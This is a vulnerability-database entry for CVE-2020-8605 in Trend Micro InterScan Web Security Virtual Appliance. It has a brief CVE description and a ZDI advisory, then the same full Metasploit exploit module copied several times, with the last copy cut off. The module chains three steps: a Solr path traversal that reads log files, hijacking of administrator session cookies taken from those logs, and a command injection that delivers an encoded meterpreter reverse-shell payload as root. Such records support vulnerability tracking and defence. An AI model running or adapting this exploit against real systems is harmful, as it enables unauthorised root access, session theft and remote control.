ID CVE-2020-8605 Type cve Reporter cve@mitre.org Modified 2020-06-23T02:15:00
Description
A vulnerability in Trend Micro InterScan Web Security Virtual Appliance 6.5 may allow remote attackers to execute arbitrary code on affected installations. Authentication is required to exploit this vulnerability.
{"exploitdb": [{"lastseen": "2020-07-14T20:26:17", "bulletinFamily": "exploit", "description": "", "modified": "2020-07-14T00:00:00", "published": "2020-07-14T00:00:00", "id": "EDB-ID:48667", "href": "https://www.exploit-db.com/exploits/48667", "type": "exploitdb", "title": "Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution',\r\n 'Description' => %q{\r\n This module exploits multiple vulnerabilities together in order to achive a remote code execution.\r\n Unauthenticated users can execute a terminal command under the context of the root user.\r\n \r\n The specific flaw exists within the LogSettingHandler class of administrator interface software.\r\n When parsing the mount_device parameter, the process does not properly validate a user-supplied string\r\n before using it to execute a system call. An attacker can leverage this vulnerability to execute code in\r\n the context of root. But authentication is required to exploit this vulnerability.\r\n \r\n Another specific flaw exist within the proxy service, which listens on port 8080 by default. Unauthenticated users\r\n can exploit this vulnerability in order to communicate with internal services in the product.\r\n \r\n Last but not least a flaw exists within the Apache Solr application, which is installed within the product.\r\n When parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations.\r\n An attacker can leverage this vulnerability to disclose information in the context of the IWSS user.\r\n \r\n Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user.\r\n \r\n Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2020-8604'],\r\n ['CVE', '2020-8605'],\r\n ['CVE', '2020-8606'],\r\n ['ZDI', '20-676'],\r\n ['ZDI', '20-677'],\r\n ['ZDI', '20-678']\r\n ],\r\n 'Privileged' => true,\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true,\r\n 'payload' => 'python/meterpreter/reverse_tcp',\r\n 'WfsDelay' => 30\r\n },\r\n 'Payload' =>\r\n {\r\n 'Compat' =>\r\n {\r\n 'ConnectionType' => '-bind'\r\n }\r\n },\r\n 'Platform' => ['python'],\r\n 'Arch' => ARCH_PYTHON,\r\n 'Targets' => [ ['Automatic', {}] ],\r\n 'DisclosureDate' => '2020-06-10',\r\n 'DefaultTarget' => 0,\r\n 'Notes' =>\r\n {\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION],\r\n 'SideEffects' => [IOC_IN_LOGS]\r\n }\r\n )\r\n )\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(8443),\r\n OptInt.new('PROXY_PORT', [true, 'Port number of Trend Micro Web Filter Proxy service', 8080])\r\n ]\r\n )\r\n end\r\n \r\n def hijack_cookie\r\n # Updating SSL and RPORT in order to communicate with HTTP proxy service.\r\n if datastore['SSL']\r\n ssl_restore = true\r\n datastore['SSL'] = false\r\n end\r\n port_restore = datastore['RPORT']\r\n datastore['RPORT'] = datastore['PROXY_PORT']\r\n \r\n @jsessionid = ''\r\n \r\n # We are exploiting proxy service vulnerability in order to fetch content of catalina.out file\r\n print_status('Trying to extract session ID by exploiting reverse proxy service')\r\n \r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => \"http://#{datastore['RHOST']}:8983/solr/collection0/replication\",\r\n 'vars_get' => {\r\n 'command' => 'filecontent',\r\n 'wt' => 'filestream',\r\n 'generation' => 1,\r\n 'file' => '../' * 7 << 'var/iwss/tomcat/logs/catalina.out'\r\n }\r\n })\r\n \r\n # Restore variables and validate extracted sessionid\r\n datastore['SSL'] = true if ssl_restore\r\n datastore['RPORT'] = port_restore\r\n \r\n # Routine check on res object\r\n unless res\r\n fail_with(Failure::Unreachable, 'Target is unreachable.')\r\n end\r\n \r\n # If the res code is not 200 that means proxy service is not vulnerable.\r\n unless res.code == 200\r\n @jsessionid = -1\r\n return\r\n end\r\n \r\n # Now we are going to extract all JESSIONID from log file and store them in array.\r\n cookies = res.body.scan(/CheckUserLogon sessionid : (.*)/).flatten\r\n \r\n if cookies.empty?\r\n @jsessionid = 0\r\n print_error('System is vulnerable, however a user session was not detected and is therefore unexploitable. Retry after a user logs in.')\r\n return\r\n end\r\n \r\n print_good(\"Extracted number of JSESSIONID: #{cookies.length}\")\r\n \r\n # We gotta switch back to adminsitrator interface port instead of proxy service. Restore rport and ssl variables.\r\n datastore['SSL'] = true if ssl_restore\r\n datastore['RPORT'] = port_restore\r\n \r\n # Latest cookie in the log file is the one most probably active. So that we use reverse on array.\r\n cookies.reverse.each_with_index do |cookie, index|\r\n print_status(\"Testing JSESSIONID ##{index} : #{cookie}\")\r\n \r\n # This endpoints is basically check session :)\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri('rest', 'commonlog', 'get_sessionID'),\r\n 'cookie' => \"JSESSIONID=#{cookie}\"\r\n })\r\n \r\n # Routine res check\r\n unless res\r\n fail_with(Failure::UnexpectedReply, 'Target is unreachable.')\r\n end\r\n \r\n # If the cookie is active !\r\n if res.code == 200 && res.body.include?('session_flag')\r\n print_good(\"Awesome!!! JESSIONID ##{index} is active.\")\r\n @jsessionid = cookie\r\n break\r\n end\r\n \r\n print_warning(\"JSESSIONID ##{index} is inactive! Moving to the next one.\")\r\n end\r\n \r\n if @jsessionid.empty?\r\n print_error('System is vulnerable, however extracted cookies are not valid! Please wait for a user or admin to login.')\r\n end\r\n end\r\n \r\n def check\r\n #\r\n # @jsessionid can be one of the following value\r\n #\r\n # -1 = Proxy service is not vulnerable, which means we'r not gonna\r\n # be able to read catalina.out\r\n #\r\n # 0 = Proxy service is vulnerable, but catalina.out does not contain any\r\n # jessionid string yet !\r\n #\r\n # empty = Proxy service is vulnerable, but jessionid within log file but\r\n # none of them are valid:(\r\n #\r\n # string = Proxy service is vulnerable and sessionid is valid !\r\n #\r\n hijack_cookie\r\n \r\n if @jsessionid == -1\r\n CheckCode::Safe\r\n else\r\n CheckCode::Vulnerable\r\n end\r\n end\r\n \r\n def exploit\r\n \r\n unless check == CheckCode::Vulnerable\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\r\n end\r\n \r\n #\r\n # 0 => Proxy service is vulnerable, but catalina.out does not contain any\r\n # jessionid string yet !\r\n #\r\n # empty => Proxy service is vulnerable, but jessionid within log file but\r\n # none of them are valid:(\r\n #\r\n if @jsessionid.empty? || @jessionid == 0\r\n fail_with Failure::NoAccess, ''\r\n end\r\n \r\n print_status('Exploiting command injection vulnerability')\r\n \r\n # Yet another app specific bypass is going on here.\r\n # It's so buggy to make the cmd payloads work under the following circumstances (Weak blacklisting, double escaping etc)\r\n # For that reason, I am planting our payload dropper within the perl command.\r\n \r\n cmd = \"python -c \\\"#{payload.encoded}\\\"\"\r\n final_payload = cmd.to_s.unpack1('H*')\r\n p = \"perl -e 'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'\"\r\n \r\n vars_post = {\r\n mount_device: \"mount $(#{p}) /var/offload\",\r\n cmd: 'mount'\r\n }\r\n \r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'),\r\n 'cookie' => \"JSESSIONID=#{@jsessionid}\",\r\n 'ctype' => 'application/json',\r\n 'data' => vars_post.to_json\r\n })\r\n end\r\n end", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/48667"}], "zdi": [{"lastseen": "2020-06-22T11:40:19", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trend Micro InterScan Web Security Virtual Appliance. Authentication is required to exploit this vulnerability. The specific flaw exists within the LogSettingHandler class. When parsing the mount_device parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.", "modified": "2020-06-22T00:00:00", "published": "2020-05-27T00:00:00", "id": "ZDI-20-676", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-676/", "title": "Trend Micro InterScan Web Security Virtual Appliance Command Injection Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-06-24T17:07:23", "bulletinFamily": "exploit", "description": "", "modified": "2020-06-22T00:00:00", "published": "2020-06-22T00:00:00", "id": "PACKETSTORM:158171", "href": "https://packetstormsecurity.com/files/158171/Trend-Micro-Web-Security-Virtual-Appliance-Remote-Code-Execution.html", "title": "Trend Micro Web Security (Virtual Appliance) Remote Code Execution", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution', \n'Description' => %q{ \nThis module exploits multiple vulnerabilities together in order to achive a remote code execution. \nUnauthenticated users can execute a terminal command under the context of the root user. \n \nThe specific flaw exists within the LogSettingHandler class of administrator interface software. \nWhen parsing the mount_device parameter, the process does not properly validate a user-supplied string \nbefore using it to execute a system call. An attacker can leverage this vulnerability to execute code in \nthe context of root. But authentication is required to exploit this vulnerability. \n \nAnother specific flaw exist within the proxy service, which listens on port 8080 by default. Unauthenticated users \ncan exploit this vulnerability in order to communicate with internal services in the product. \n \nLast but not least a flaw exists within the Apache Solr application, which is installed within the product. \nWhen parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations. \nAn attacker can leverage this vulnerability to disclose information in the context of the IWSS user. \n \nDue to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user. \n \nVersion perior to 6.5 SP2 Patch 4 (Build 1901) are affected. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module \n], \n'References' => \n[ \n['CVE', '2020-8604'], \n['CVE', '2020-8605'], \n['CVE', '2020-8606'], \n['ZDI', '20-676'], \n['ZDI', '20-677'], \n['ZDI', '20-678'] \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'SSL' => true, \n'payload' => 'python/meterpreter/reverse_tcp', \n'WfsDelay' => 30 \n}, \n'Payload' => \n{ \n'Compat' => \n{ \n'ConnectionType' => '-bind' \n} \n}, \n'Platform' => ['python'], \n'Arch' => ARCH_PYTHON, \n'Targets' => [ ['Automatic', {}] ], \n'DisclosureDate' => '2020-06-10', \n'DefaultTarget' => 0, \n'Notes' => \n{ \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \n \nregister_options( \n[ \nOpt::RPORT(8443), \nOptInt.new('PROXY_PORT', [true, 'Port number of Trend Micro Web Filter Proxy service', 8080]) \n] \n) \nend \n \ndef hijack_cookie \n# Updating SSL and RPORT in order to communicate with HTTP proxy service. \nif datastore['SSL'] \nssl_restore = true \ndatastore['SSL'] = false \nend \nport_restore = datastore['RPORT'] \ndatastore['RPORT'] = datastore['PROXY_PORT'] \n \n@jsessionid = '' \n \n# We are exploiting proxy service vulnerability in order to fetch content of catalina.out file \nprint_status('Trying to extract session ID by exploiting reverse proxy service') \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => \"http://#{datastore['RHOST']}:8983/solr/collection0/replication\", \n'vars_get' => { \n'command' => 'filecontent', \n'wt' => 'filestream', \n'generation' => 1, \n'file' => '../' * 7 << 'var/iwss/tomcat/logs/catalina.out' \n} \n}) \n \n# Restore variables and validate extracted sessionid \ndatastore['SSL'] = true if ssl_restore \ndatastore['RPORT'] = port_restore \n \n# Routine check on res object \nunless res \nfail_with(Failure::Unreachable, 'Target is unreachable.') \nend \n \n# If the res code is not 200 that means proxy service is not vulnerable. \nunless res.code == 200 \n@jsessionid = -1 \nreturn \nend \n \n# Now we are going to extract all JESSIONID from log file and store them in array. \ncookies = res.body.scan(/CheckUserLogon sessionid : (.*)/).flatten \n \nif cookies.empty? \n@jsessionid = 0 \nprint_error('System is vulnerable, however a user session was not detected and is therefore unexploitable. Retry after a user logs in.') \nreturn \nend \n \nprint_good(\"Extracted number of JSESSIONID: #{cookies.length}\") \n \n# We gotta switch back to adminsitrator interface port instead of proxy service. Restore rport and ssl variables. \ndatastore['SSL'] = true if ssl_restore \ndatastore['RPORT'] = port_restore \n \n# Latest cookie in the log file is the one most probably active. So that we use reverse on array. \ncookies.reverse.each_with_index do |cookie, index| \nprint_status(\"Testing JSESSIONID ##{index} : #{cookie}\") \n \n# This endpoints is basically check session :) \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri('rest', 'commonlog', 'get_sessionID'), \n'cookie' => \"JSESSIONID=#{cookie}\" \n}) \n \n# Routine res check \nunless res \nfail_with(Failure::UnexpectedReply, 'Target is unreachable.') \nend \n \n# If the cookie is active ! \nif res.code == 200 && res.body.include?('session_flag') \nprint_good(\"Awesome!!! JESSIONID ##{index} is active.\") \n@jsessionid = cookie \nbreak \nend \n \nprint_warning(\"JSESSIONID ##{index} is inactive! Moving to the next one.\") \nend \n \nif @jsessionid.empty? \nprint_error('System is vulnerable, however extracted cookies are not valid! Please wait for a user or admin to login.') \nend \nend \n \ndef check \n# \n# @jsessionid can be one of the following value \n# \n# -1 = Proxy service is not vulnerable, which means we'r not gonna \n# be able to read catalina.out \n# \n# 0 = Proxy service is vulnerable, but catalina.out does not contain any \n# jessionid string yet ! \n# \n# empty = Proxy service is vulnerable, but jessionid within log file but \n# none of them are valid:( \n# \n# string = Proxy service is vulnerable and sessionid is valid ! \n# \nhijack_cookie \n \nif @jsessionid == -1 \nCheckCode::Safe \nelse \nCheckCode::Vulnerable \nend \nend \n \ndef exploit \n \nunless check == CheckCode::Vulnerable \nfail_with Failure::NotVulnerable, 'Target is not vulnerable' \nend \n \n# \n# 0 => Proxy service is vulnerable, but catalina.out does not contain any \n# jessionid string yet ! \n# \n# empty => Proxy service is vulnerable, but jessionid within log file but \n# none of them are valid:( \n# \nif @jsessionid.empty? || @jessionid == 0 \nfail_with Failure::NoAccess, '' \nend \n \nprint_status('Exploiting command injection vulnerability') \n \n# Yet another app specific bypass is going on here. \n# It's so buggy to make the cmd payloads work under the following circumstances (Weak blacklisting, double escaping etc) \n# For that reason, I am planting our payload dropper within the perl command. \n \ncmd = \"python -c \\\"#{payload.encoded}\\\"\" \nfinal_payload = cmd.to_s.unpack1('H*') \np = \"perl -e 'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'\" \n \nvars_post = { \nmount_device: \"mount $(#{p}) /var/offload\", \ncmd: 'mount' \n} \n \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'), \n'cookie' => \"JSESSIONID=#{@jsessionid}\", \n'ctype' => 'application/json', \n'data' => vars_post.to_json \n}) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/158171/trendmicro_websecurity_exec.rb.txt"}], "metasploit": [{"lastseen": "2020-07-14T13:58:51", "bulletinFamily": "exploit", "description": "This module exploits multiple vulnerabilities together in order to achive a remote code execution. Unauthenticated users can execute a terminal command under the context of the root user. The specific flaw exists within the LogSettingHandler class of administrator interface software. When parsing the mount_device parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. But authentication is required to exploit this vulnerability. Another specific flaw exist within the proxy service, which listens on port 8080 by default. Unauthenticated users can exploit this vulnerability in order to communicate with internal services in the product. Last but not least a flaw exists within the Apache Solr application, which is installed within the product. When parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose information in the context of the IWSS user. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user. Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected.\n", "modified": "2020-06-20T16:05:48", "published": "2020-06-14T17:33:46", "id": "MSF:EXPLOIT/LINUX/HTTP/TRENDMICRO_WEBSECURITY_EXEC", "href": "", "type": "metasploit", "title": "Trend Micro Web Security (Virtual Appliance) Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution',\n 'Description' => %q{\n This module exploits multiple vulnerabilities together in order to achive a remote code execution.\n Unauthenticated users can execute a terminal command under the context of the root user.\n\n The specific flaw exists within the LogSettingHandler class of administrator interface software.\n When parsing the mount_device parameter, the process does not properly validate a user-supplied string\n before using it to execute a system call. An attacker can leverage this vulnerability to execute code in\n the context of root. But authentication is required to exploit this vulnerability.\n\n Another specific flaw exist within the proxy service, which listens on port 8080 by default. Unauthenticated users\n can exploit this vulnerability in order to communicate with internal services in the product.\n\n Last but not least a flaw exists within the Apache Solr application, which is installed within the product.\n When parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations.\n An attacker can leverage this vulnerability to disclose information in the context of the IWSS user.\n\n Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user.\n\n Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module\n ],\n 'References' =>\n [\n ['CVE', '2020-8604'],\n ['CVE', '2020-8605'],\n ['CVE', '2020-8606'],\n ['ZDI', '20-676'],\n ['ZDI', '20-677'],\n ['ZDI', '20-678']\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'SSL' => true,\n 'payload' => 'python/meterpreter/reverse_tcp',\n 'WfsDelay' => 30\n },\n 'Payload' =>\n {\n 'Compat' =>\n {\n 'ConnectionType' => '-bind'\n }\n },\n 'Platform' => ['python'],\n 'Arch' => ARCH_PYTHON,\n 'Targets' => [ ['Automatic', {}] ],\n 'DisclosureDate' => '2020-06-10',\n 'DefaultTarget' => 0,\n 'Notes' =>\n {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(8443),\n OptInt.new('PROXY_PORT', [true, 'Port number of Trend Micro Web Filter Proxy service', 8080])\n ]\n )\n end\n\n def hijack_cookie\n # Updating SSL and RPORT in order to communicate with HTTP proxy service.\n if datastore['SSL']\n ssl_restore = true\n datastore['SSL'] = false\n end\n port_restore = datastore['RPORT']\n datastore['RPORT'] = datastore['PROXY_PORT']\n\n @jsessionid = ''\n\n # We are exploiting proxy service vulnerability in order to fetch content of catalina.out file\n print_status('Trying to extract session ID by exploiting reverse proxy service')\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => \"http://#{datastore['RHOST']}:8983/solr/collection0/replication\",\n 'vars_get' => {\n 'command' => 'filecontent',\n 'wt' => 'filestream',\n 'generation' => 1,\n 'file' => '../' * 7 << 'var/iwss/tomcat/logs/catalina.out'\n }\n })\n\n # Restore variables and validate extracted sessionid\n datastore['SSL'] = true if ssl_restore\n datastore['RPORT'] = port_restore\n\n # Routine check on res object\n unless res\n fail_with(Failure::Unreachable, 'Target is unreachable.')\n end\n\n # If the res code is not 200 that means proxy service is not vulnerable.\n unless res.code == 200\n @jsessionid = -1\n return\n end\n\n # Now we are going to extract all JESSIONID from log file and store them in array.\n cookies = res.body.scan(/CheckUserLogon sessionid : (.*)/).flatten\n\n if cookies.empty?\n @jsessionid = 0\n print_error('System is vulnerable, however a user session was not detected and is therefore unexploitable. Retry after a user logs in.')\n return\n end\n\n print_good(\"Extracted number of JSESSIONID: #{cookies.length}\")\n\n # We gotta switch back to adminsitrator interface port instead of proxy service. Restore rport and ssl variables.\n datastore['SSL'] = true if ssl_restore\n datastore['RPORT'] = port_restore\n\n # Latest cookie in the log file is the one most probably active. So that we use reverse on array.\n cookies.reverse.each_with_index do |cookie, index|\n print_status(\"Testing JSESSIONID ##{index} : #{cookie}\")\n\n # This endpoints is basically check session :)\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri('rest', 'commonlog', 'get_sessionID'),\n 'cookie' => \"JSESSIONID=#{cookie}\"\n })\n\n # Routine res check\n unless res\n fail_with(Failure::UnexpectedReply, 'Target is unreachable.')\n end\n\n # If the cookie is active !\n if res.code == 200 && res.body.include?('session_flag')\n print_good(\"Awesome!!! JESSIONID ##{index} is active.\")\n @jsessionid = cookie\n break\n end\n\n print_warning(\"JSESSIONID ##{index} is inactive! Moving to the next one.\")\n end\n\n if @jsessionid.empty?\n print_error('System is vulnerable, however extracted cookies are not valid! Please wait for a user or admin to login.')\n end\n end\n\n def check\n #\n # @jsessionid can be one of the following value\n #\n # -1 = Proxy service is not vulnerable, which means we'r not gonna\n # be able to read catalina.out\n #\n # 0 = Proxy service is vulnerable, but catalina.out does not contain any\n # jessionid string yet !\n #\n # empty = Proxy service is vulnerable, but jessionid within log file but\n # none of them are valid:(\n #\n # string = Proxy service is vulnerable and sessionid is valid !\n #\n hijack_cookie\n\n if @jsessionid == -1\n CheckCode::Safe\n else\n CheckCode::Vulnerable\n end\n end\n\n def exploit\n\n unless check == CheckCode::Vulnerable\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n #\n # 0 => Proxy service is vulnerable, but catalina.out does not contain any\n # jessionid string yet !\n #\n # empty => Proxy service is vulnerable, but jessionid within log file but\n # none of them are valid:(\n #\n if @jsessionid.empty? || @jessionid == 0\n fail_with Failure::NoAccess, ''\n end\n\n print_status('Exploiting command injection vulnerability')\n\n # Yet another app specific bypass is going on here.\n # It's so buggy to make the cmd payloads work under the following circumstances (Weak blacklisting, double escaping etc)\n # For that reason, I am planting our payload dropper within the perl command.\n\n cmd = \"python -c \\\"#{payload.encoded}\\\"\"\n final_payload = cmd.to_s.unpack1('H*')\n p = \"perl -e 'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'\"\n\n vars_post = {\n mount_device: \"mount $(#{p}) /var/offload\",\n cmd: 'mount'\n }\n\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'),\n 'cookie' => \"JSESSIONID=#{@jsessionid}\",\n 'ctype' => 'application/json',\n 'data' => vars_post.to_json\n })\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/trendmicro_websecurity_exec.rb"}], "0daydb": [{"lastseen": "2020-06-24T13:13:07", "bulletinFamily": "exploit", "description": "This Metasploit module exploits multiple vulnerabilities together in order to achieve a remote code execution.", "modified": "2020-06-24T08:21:14", "published": "2020-06-24T08:21:12", "id": "0DAYDB:CEDEF1CFCB77584DD9FCF93507303E1D", "href": "https://0daydb.com/trend-micro-web-security-remote-code-execution.html", "title": "Trend Micro Web Security - Remote Code Execution", "type": "0daydb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution',\n 'Description' => %q{\n This module exploits multiple vulnerabilities together in order to achive a remote code execution.\n Unauthenticated users can execute a terminal command under the context of the root user.\n\n The specific flaw exists within the LogSettingHandler class of administrator interface software.\n When parsing the mount_device parameter, the process does not properly validate a user-supplied string\n before using it to execute a system call. An attacker can leverage this vulnerability to execute code in\n the context of root. But authentication is required to exploit this vulnerability.\n\n Another specific flaw exist within the proxy service, which listens on port 8080 by default. Unauthenticated users\n can exploit this vulnerability in order to communicate with internal services in the product.\n\n Last but not least a flaw exists within the Apache Solr application, which is installed within the product.\n When parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations.\n An attacker can leverage this vulnerability to disclose information in the context of the IWSS user.\n\n Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user.\n\n Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Mehmet Ince <[email\u00a0protected]>' # discovery & msf module\n ],\n 'References' =>\n [\n ['CVE', '2020-8604'],\n ['CVE', '2020-8605'],\n ['CVE', '2020-8606'],\n ['ZDI', '20-676'],\n ['ZDI', '20-677'],\n ['ZDI', '20-678']\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'SSL' => true,\n 'payload' => 'python/meterpreter/reverse_tcp',\n 'WfsDelay' => 30\n },\n 'Payload' =>\n {\n 'Compat' =>\n {\n 'ConnectionType' => '-bind'\n }\n },\n 'Platform' => ['python'],\n 'Arch' => ARCH_PYTHON,\n 'Targets' => [ ['Automatic', {}] ],\n 'DisclosureDate' => '2020-06-10',\n 'DefaultTarget' => 0,\n 'Notes' =>\n {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(8443),\n OptInt.new('PROXY_PORT', [true, 'Port number of Trend Micro Web Filter Proxy service', 8080])\n ]\n )\n end\n\n def hijack_cookie\n # Updating SSL and RPORT in order to communicate with HTTP proxy service.\n if datastore['SSL']\n ssl_restore = true\n datastore['SSL'] = false\n end\n port_restore = datastore['RPORT']\n datastore['RPORT'] = datastore['PROXY_PORT']\n\n @jsessionid = ''\n\n # We are exploiting proxy service vulnerability in order to fetch content of catalina.out file\n print_status('Trying to extract session ID by exploiting reverse proxy service')\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => \"http://#{datastore['RHOST']}:8983/solr/collection0/replication\",\n 'vars_get' => {\n 'command' => 'filecontent',\n 'wt' => 'filestream',\n 'generation' => 1,\n 'file' => '../' * 7 << 'var/iwss/tomcat/logs/catalina.out'\n }\n })\n\n # Restore variables and validate extracted sessionid\n datastore['SSL'] = true if ssl_restore\n datastore['RPORT'] = port_restore\n\n # Routine check on res object\n unless res\n fail_with(Failure::Unreachable, 'Target is unreachable.')\n end\n\n # If the res code is not 200 that means proxy service is not vulnerable.\n unless res.code == 200\n @jsessionid = -1\n return\n end\n\n # Now we are going to extract all JESSIONID from log file and store them in array.\n cookies = res.body.scan(/CheckUserLogon sessionid : (.*)/).flatten\n\n if cookies.empty?\n @jsessionid = 0\n print_error('System is vulnerable, however a user session was not detected and is therefore unexploitable. Retry after a user logs in.')\n return\n end\n\n print_good(\"Extracted number of JSESSIONID: #{cookies.length}\")\n\n # We gotta switch back to adminsitrator interface port instead of proxy service. Restore rport and ssl variables.\n datastore['SSL'] = true if ssl_restore\n datastore['RPORT'] = port_restore\n\n # Latest cookie in the log file is the one most probably active. So that we use reverse on array.\n cookies.reverse.each_with_index do |cookie, index|\n print_status(\"Testing JSESSIONID ##{index} : #{cookie}\")\n\n # This endpoints is basically check session :)\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri('rest', 'commonlog', 'get_sessionID'),\n 'cookie' => \"JSESSIONID=#{cookie}\"\n })\n\n # Routine res check\n unless res\n fail_with(Failure::UnexpectedReply, 'Target is unreachable.')\n end\n\n # If the cookie is active !\n if res.code == 200 && res.body.include?('session_flag')\n print_good(\"Awesome!!! JESSIONID ##{index} is active.\")\n @jsessionid = cookie\n break\n end\n\n print_warning(\"JSESSIONID ##{index} is inactive! Moving to the next one.\")\n end\n\n if @jsessionid.empty?\n print_error('System is vulnerable, however extracted cookies are not valid! Please wait for a user or admin to login.')\n end\n end\n\n def check\n #\n # @jsessionid can be one of the following value\n #\n # -1 = Proxy service is not vulnerable, which means we'r not gonna\n # be able to read catalina.out\n #\n # 0 = Proxy service is vulnerable, but catalina.out does not contain any\n # jessionid string yet !\n #\n # empty = Proxy service is vulnerable, but jessionid within log file but\n # none of them are valid:(\n #\n # string = Proxy service is vulnerable and sessionid is valid !\n #\n hijack_cookie\n\n if @jsessionid == -1\n CheckCode::Safe\n else\n CheckCode::Vulnerable\n end\n end\n\n def exploit\n\n unless check == CheckCode::Vulnerable\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n #\n # 0 => Proxy service is vulnerable, but catalina.out does not contain any\n # jessionid string yet !\n #\n # empty => Proxy service is vulnerable, but jessionid within log file but\n # none of them are valid:(\n #\n if @jsessionid.empty? || @jessionid == 0\n fail_with Failure::NoAccess, ''\n end\n\n print_status('Exploiting command injection vulnerability')\n\n # Yet another app specific bypass is going on 